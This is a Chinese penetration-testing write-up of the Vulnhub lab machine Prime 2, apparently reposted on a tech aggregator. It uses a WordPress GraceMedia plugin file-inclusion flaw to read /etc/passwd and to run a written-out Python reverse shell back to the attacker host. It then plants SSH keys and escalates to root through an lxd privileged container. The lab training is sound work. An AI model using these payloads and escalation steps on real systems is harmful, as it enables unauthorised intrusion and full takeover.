IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> [渗透测试学习靶机07] vulnhub靶场 Prime 2 -> 正文阅读

[网络协议][渗透测试学习靶机07] vulnhub靶场 Prime 2

Kali的IP地址:192.168.127.139

靶机的IP地址:192.168.127.145

目录

一、信息搜集

二、漏洞挖掘

三、漏洞利用

四、提权

总结:


Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。

一、信息搜集

1.1、扫描主机IP

1.2、扫描端口

发现开放了22(ssh)、80(http)、139、445、10123(使用python搭建的http)等端口

1.3、访问端口

先访问80端口,发现就是一个正常的页面

之后在访问10123端口,发现应该是某个用户的家目录

我们将所有文件下载下来进行查看

先创建一个文件夹,把所有下载的文件放在文件夹里

在这里我就下载了几个文件,因为其他文件名字有点怪,我something文件中发下一些提示,也没啥东西

1.4、扫描目录

通过目录扫描发现一个wordpress的站点和一个server目录

我们先查看server目录,下载server目录下的文件,解压后发现是一套网站的源码,没有什么作用

我们接着查看wp站点,就是一个普通的页面。

二、漏洞挖掘

猜想一下肯定其他地方有漏洞,我们使用wpscan进行扫描,试一下

第一次使用WPScan软件的时候需要更新,但是更新会报错,这个时候看我另外一篇文章,也是做这个靶机的时候整理的

链接:Wpscan更新报错的问题,以及使用

扫描命令:

wpscan --url http://192.168.127.145/wp/ --enumerate

我们得到一个用户名:admin

接着在使用wpscan api-token后再次进行扫描发现存在一个LFI漏洞(文件包含漏洞)

扫描命令:

wpscan --url http://192.168.127.145/wp/ -e --api-token CPW3*********************************ZkfaXk

三、漏洞利用

(利用以上的方式拿到 webshell,或者其他权限)

如上图所示,在画箭头的地方有一个网址:Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion

Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion可以看到文件包含漏洞过程

接着我们查看一下passwd


view-source:http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

接着进行Webshell 反弹

http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.139",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然后我们使用python获取一个交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

并在/var/www/html/wp的目录下发现数据库的密码:root

于是用?enum4linux进行扫描,获得一个shell

enum4linux -a 192.168.127.145

接着我们使用smbclient进行连接

smbclient? //192.168.127.145/welcome

密码为:root

紧接着我们创建ssh公钥,ssh-keygen

?ssh-keygen -b 2048

id_rsa.pub复制到tmp目录下命名位authorized_keys

authorized_keys上传到目标主机的.ssh目录下

然后使用ssh登录到目标主机

查看用户id发现jarves还属于lxd

首先我们从github下载构建好的Alpine,然后进行执行

git clone? https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

四、提权

接着我们将生成的文件上传至目标机器

?
wget http://192.168.127.139:8889/alpine-v3.16-x86_64-20221016_1724.tar.gz?

接着我们使用lxd进行初始化

?
lxd init

然后导入镜像

?lxc image import ./alpine-v3.16-x86_64-20221016_1724.tar.gz --alias myimage

查看镜像

lxc image list

进入到容器的命令行

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

进入mnt/root目录,这个目录包含所有宿主机文件

替换root目录下的authorized_keys文件

最后使用ssh连接拿到root权限

总结:

本次靶机通关练习,难度比较难,整个过程中涉及到LFI漏洞(文件包含漏洞),有关Wpscan软件的使用,是一个有关文件上传漏洞的练习。

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-10-31 12:34:57  更:2022-10-31 12:39:16 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 5:43:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计